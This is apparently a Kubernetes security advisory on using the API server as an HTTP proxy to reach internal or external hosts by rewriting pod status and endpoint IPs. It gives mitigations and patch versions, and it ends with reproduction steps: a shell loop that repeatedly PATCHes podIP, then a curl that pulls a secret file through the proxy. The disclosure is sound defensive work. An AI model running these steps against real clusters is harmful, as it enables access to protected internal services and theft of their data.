It was reported to us by Michael Schubert of Kinvolk that the
Kubernetes API server can be used as an HTTP proxy not only to
cluster-internal but also to external target IP addresses. By
modifying the pod status and endpoint addresses for an exposed
deployment, an attacker can send HTTP requests to servers within the
network in which the Kubernetes API server is running.
It’s important to note that pod status addresses (such as podIP) are
typically a more locked-down attribute: by default, only
control-plane, kubelet, and admin roles have write access to pod
status.
Write permission on the API server endpoint
/api/v1/namespaces/$NS/pods/$POD/status should not be given to
actors that should not have the ability to direct pod traffic. Note
that these permission controls will be ineffective against users with
direct access to nodes, as they can impersonate the kubelet on that
node.
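As an illustration of the kind of grant to audit for, the following is
a hypothetical Role manifest (the namespace and name are made-up
example values) that gives a subject write access to the pods/status
subresource -- and therefore the ability to rewrite podIP:

```shell
# Hypothetical example Role (names are illustrative, not from the
# advisory): any subject bound to it can patch pod status, and so
# could redirect proxied traffic.
cat > pod-status-writer-role.yaml <<'EOF'
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-status-writer
rules:
- apiGroups: [""]
  resources: ["pods/status"]
  verbs: ["get", "patch", "update"]
EOF
# Review any bindings that grant rules like the above.
grep 'pods/status' pod-status-writer-role.yaml
```

You can check whether a given subject holds such access with, for
example, `kubectl auth can-i patch pods/status --as=<subject>`.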
After discussing with the appropriate SIGs we have come to the
conclusion that this is indeed a problem for operators running an API
server in a different network than the nodes.
It is partially mitigated by using SSH Tunnels, since the apiserver
routes proxy traffic through ssh tunnels to the node network. Note
that SSH Tunnels are only usable with the Google Compute Engine (gce)
cloud provider, and they are deprecated and will be removed in the
next Kubernetes release.
Since 1.10, it is partially mitigated by the default behavior of the
API server (ServiceProxyAllowExternalIPs=false), which only allows
the service and pod proxy subresources to contact endpoint IPs that
correspond to pod IPs (as reported in pod status).
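The effect of that restriction can be sketched locally: a proxy
target is only accepted when it matches the podIP reported in pod
status. A rough shell approximation (the JSON document and IPs below
are made-up example values, not real API server output):

```shell
# Example pod status document (made-up values for illustration).
cat > status.json <<'EOF'
{"status": {"podIP": "10.244.1.5", "phase": "Running"}}
EOF
# Extract the podIP reported in pod status...
POD_IP=$(sed -n 's/.*"podIP": "\([^"]*\)".*/\1/p' status.json)
# ...and only permit proxying to an endpoint that matches it.
TARGET="10.244.1.5"
if [ "$TARGET" = "$POD_IP" ]; then
  echo "proxy allowed"
else
  echo "proxy denied"
fi
```

This is only a sketch of the check; the real enforcement happens
inside the API server's proxy subresource handling.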
Operators are strongly advised to run the Kubernetes API server in
the same network as the nodes, or to firewall it sufficiently. It is
highly recommended not to run any other services you wish to keep
secure and isolated on the same network as the cluster unless you
firewall them away from the cluster, and in particular to restrict
outbound connections from the API server to anything else. The
Kubernetes control plane has many user-configurable features
(aggregated APIs, dynamic admission webhooks, and conversion webhooks
coming soon) which involve the Kubernetes API server sourcing network
connections to user-specified endpoints.
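One possible sketch of that firewalling advice, restricting egress
from the API server host to the node network (the node CIDR below is
an assumed example value, and the rules are written to a file for
review rather than applied, since a drop-in ruleset would depend
heavily on your environment):

```shell
# Sketch only: limit API-server host egress to the node network.
# NODE_CIDR is an assumed example -- substitute your node subnet.
NODE_CIDR=10.128.0.0/16
cat > apiserver-egress.rules <<EOF
# allow traffic to the node network
iptables -A OUTPUT -d $NODE_CIDR -j ACCEPT
# allow loopback (used by co-located control-plane components)
iptables -A OUTPUT -o lo -j ACCEPT
# allow replies on established connections
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# drop all other outbound traffic from the API server host
iptables -A OUTPUT -j DROP
EOF
cat apiserver-egress.rules
```

Any real ruleset would also need holes for etcd, DNS, and your cloud
provider's metadata or webhook endpoints, so treat this strictly as a
starting point.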
Thanks to Micah Hausler from AWS for writing a patch that has now
been cherry-picked to the patch releases 1.10.12, 1.11.6, 1.12.4, and
1.13.1. The patch disables proxying to loopback and link-local
addresses. We still recommend using a firewall to prevent access to
all external IPs. You can view the patch here:
https://github.com/kubernetes/kubernetes/pull/71980. Please be aware
that admission webhooks were not patched, because it is common to
host webhooks on localhost. For webhooks, the attack vector is more
limited: webhooks must be a POST over HTTPS with no query strings,
and the response is not propagated to an end user.
Thanks to Michael Schubert for the find, and see below for steps to
reproduce.

Jess, on behalf of the Kubernetes Product Security Team
Steps to reproduce:
After PATCHing the pod and endpoint IP for an nginx deployment
(replicas: 1) and service with the IP address / port of the
target HTTP server, we can use curl as shown below to request the
very-secret.txt document from the target server:

kubectl proxy --port 8001 &
curl http://localhost:8001/api/v1/namespaces/default/services/nginx:32080/proxy/very-secret.txt
Please note: we have done the PATCHing of pod and endpoint IP in a
loop to make sure the target addresses and ports are not overwritten
by an update (updates happen very frequently).
while true; do
  curl -v -H 'Content-Type:application/json' -X GET \
    http://localhost:$PORT/api/v1/namespaces/default/pods/$POD/status \
    > $POD-orig.json
  cat $POD-orig.json | sed 's/"podIP": ".*",/"podIP": "'$NEWIP'",/g' \
    > $POD-patched.json
  curl -v -H 'Content-Type:application/merge-patch+json' -X PATCH \
    -d @$POD-patched.json \
    http://localhost:$PORT/api/v1/namespaces/default/pods/$POD/status
  rm -f $POD-orig.json $POD-patched.json
done
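The podIP substitution performed inside that loop can be exercised
locally against a saved status document (the JSON and NEWIP below are
made-up example values):

```shell
NEWIP=203.0.113.7   # example attacker-chosen target address
# A minimal stand-in for the status document fetched from the API
# server (made-up values).
cat > pod-orig.json <<'EOF'
{
  "status": {
    "podIP": "10.244.1.5",
    "phase": "Running"
  }
}
EOF
# Same substitution as in the loop: rewrite podIP to the chosen target.
sed 's/"podIP": ".*",/"podIP": "'$NEWIP'",/g' pod-orig.json > pod-patched.json
grep '"podIP"' pod-patched.json
```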